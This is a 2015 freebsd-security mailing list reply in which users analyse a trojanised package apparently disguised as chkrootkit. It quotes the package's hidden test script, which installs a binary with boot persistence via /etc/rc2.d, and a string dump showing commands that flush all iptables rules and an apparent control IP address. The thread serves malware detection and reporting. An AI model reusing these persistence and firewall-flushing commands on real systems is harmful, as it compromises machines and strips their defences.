has my 10.1-RELEASE system been compromised
Christopher Schulte
christopher at schulte.org
Wed Feb 25 20:56:22 UTC 2015
> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
>
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box…
I filed a report with Google about that domain (Google Safe Browsing), briefly describing what’s been recounted here on this thread. It seems quite suspicious, agreed.
Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting… take note what looks to be an IP address of 95.215.44.195.
/bin/sh
iptables -X 2> /dev/null
iptables -F 2> /dev/null
iptables -t nat -F 2> /dev/null
iptables -t nat -X 2> /dev/null
iptables -t mangle -F 2> /dev/null
iptables -t mangle -X 2> /dev/null
iptables -P INPUT ACCEPT 2> /dev/null
iptables -P FORWARD ACCEPT 2> /dev/null
iptables -P OUTPUT ACCEPT 2> /dev/null
udevd
95.215.44.195
;*3$"
> Cheers,
>
> Philip
Chris
More information about the freebsd-security
mailing list